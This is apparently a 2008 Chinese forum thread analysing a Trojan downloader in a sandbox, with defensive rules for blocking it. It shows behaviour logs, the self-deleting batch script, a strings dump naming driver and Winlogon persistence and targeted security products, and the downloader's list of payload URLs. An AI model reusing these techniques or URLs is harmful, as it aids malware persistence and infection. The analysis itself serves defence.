穿還原
病毒名称:Trojan-Downloader.Win32.Agent.uts (Kaspersky)病毒大小:16.1 KB
病毒类型:穿還原
传播方式:未知
MD5:148E5859E86A7C6480A885994FFDA11E
测试平台:XP SP3
测试工具(hips):EQSandbox
危害程度:中
病毒分析:
1.創建 一個 .exe 和 一個 .sys
[quote]2008-07-02 12:56:59 文件保护(创建文件) 操作:使用隔离区操作
进程路径:D:\桌面\virus\svcos.exe
文件路径:C:\WINDOWS\azcp.exe
2008-07-02 12:57:02 文件保护(创建文件) 操作:使用隔离区操作
进程路径:D:\桌面\virus\svcos.exe
文件路径:C:\WINDOWS\system32\drivers\ntdapi.sys
[/quote]
2.訪問服務管理器,叫 services.exe 加載驅動
[quote]2008-07-02 12:57:03 应用程序保护(访问服务管理器) 操作:使用隔离区操作
进程路径:D:\桌面\virus\svcos.exe
[/quote]
3.執行 他新建的 azcp.exe ,azcp.exe 會運行 cmd.exe,cmd.exe 再運行 shutdown.exe 關機
[quote]2008-07-02 12:57:00 应用程序保护(运行应用程序) 操作:使用隔离区操作
进程路径:D:\桌面\virus\svcos.exe
文件路径:C:\WINDOWS\azcp.exe
[/quote]
4.創建 .bat 腳本,叫 cmd.exe 刪除自身
[quote]2008-07-02 12:57:03 文件保护(创建文件) 操作:使用隔离区操作
进程路径:D:\桌面\virus\svcos.exe
文件路径:C:\mahtesf3.bat
[/quote]
mahtesf3.bat 的內容
[quote]:Repeat1
del "D:\桌面\virus\svcos.exe"
if exist "D:\桌面\virus\svcos.exe" goto Repeat1
cd C:\
del %0
[/quote]
防范对策和规则:
1.行為很簡單,阻止 訪問服務管理器 即可
2.阻止 shutdown.exe 被運行
3.%windir%\system32\drivers 下面的驅動會自啟動,所以 不要讓陌生程序在這創建驅動!
[[i] 本帖最后由 a256886572008 于 2008-7-2 13:13 编辑 [/i]] *** 作者被禁止或删除 内容自动屏蔽 *** 创建没事 修改和加载就会出事 000046B4 004046B4 0 \DosDevices\Ntdapi0
000046C8 004046C8 0 IoGetDeviceObjectPointer
000046E4 004046E4 0 \Device\Ide\IdePort0
00004704 00404704 0 \Ntfs
00004714 00404714 0 \Device\Ntdapi0
00005C08 00405C08 0 rddisk0\DR0
00005C1C 00405C1C 0 \Device\Ha
00005C30 00405C30 0 NP.SYS
00007E44 00407E44 0 SoftProtect=
00007E68 00407E68 0 Shell
00007E70 00407E70 0 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
00007EB0 00407EB0 0 %s\%s
00007EB8 00407EB8 0 %s\system32\%s
00007EC8 00407EC8 0 %s\system32\%s%s
00007EDC 00407EDC 0 %s\%s%s
00007EEC 00407EEC 0 orer.exe
00007EF8 00407EF8 0 del %0
00007F04 00407F04 0 cd C:\
00007F10 00407F10 0 :Repeat1
00007F1C 00407F1C 0 c:\mahtesf3.bat
00007F30 00407F30 0 if exist "%s" goto Repeat1
00007F4C 00407F4C 0 del "%s"
00007F58 00407F58 0 %c%c%c%c
00007F68 00407F68 0 HintSecu.sys
00007F84 00407F84 0 C:\Program Files\HintSoft\PubwinClient\Patch
00007FB4 00407FB4 0 C:\Program Files\360Safebox\sprotect.ini
00007FE0 00407FE0 0 c:\sysfiles\ 他創建的 .exe 是下載者
[quote][oo]
c0=http://snbjoy.cn/hb/0.exe
c1=http://snbjoy.cn/hb/1.exe
c2=http://snbjoy.cn/hb/2.exe
c3=http://snbjoy.cn/hb/3.exe
c4=http://snbjoy.cn/hb/4.exe
c5=http://snbjoy.cn/hb/5.exe
c6=http://snbjoy.cn/hb/6.exe
c7=http://snbjoy.cn/hb/7.exe
c8=http://snbjoy.cn/hb/8.exe
c9=http://snbjoy.cn/hb/9.exe
c10=http://snbjoy.cn/hb/10.exe
c11=http://snbjoy.cn/hb/11.exe
c12=http://snbjoy.cn/hb/12.exe
c13=http://snbjoy.cn/hb/13.exe
c14=http://snbjoy.cn/hb/14.exe
c15=http://snbjoy.cn/hb/15.exe
c16=http://snbjoy.cn/hb/16.exe
c17=http://snbjoy.cn/hb/17.exe
c18=http://snbjoy.cn/hb/18.exe
c19=http://snbjoy.cn/hb/19.exe
c20=http://snbjoy.cn/hb/20.exe
c21=http://snbjoy.cn/hb/22.exe
c22=http://snbjoy.cn/hb/23.exe
c23=http://snbjoy.cn/hb/24.exe
c24=http://snbjoy.cn/hb/25.exe
c25=http://snbjoy.cn/hb/27.exe
c26=http://snbjoy.cn/hb/29.exe
c27=http://snbjoy.cn/hb/30.exe
c28=http://snbjoy.cn/hb/26.exe[/quote] 什么破病毒,运行不了。没反应。 下载内容
htp://jnzuguo.cn/update.txt
加载驱动后破eq的fd了,但eq不提示工作环境异常. EQ的FD是 FSD
工作环境异常是检测的SSDT
……
页:
[1]